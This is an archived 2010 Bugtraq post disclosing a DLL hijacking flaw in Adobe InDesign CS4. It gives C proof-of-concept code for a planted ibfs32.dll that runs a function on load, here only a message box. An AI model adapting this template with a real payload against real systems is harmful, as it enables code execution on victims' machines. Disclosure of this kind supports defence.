Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)

From: glafkos () astalavista com
Date: 25 Aug 2010 17:56:53 -0000
/* 
Exploit Title: Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 v6.0
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .indl .indp .indt .inx
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include <windows.h>

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
        {
        case DLL_PROCESS_ATTACH:
                dll_hijack();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
        }
        return TRUE;
}

int dll_hijack()
{
  MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}
Previous By Date Next
Previous By Thread Next

Current thread: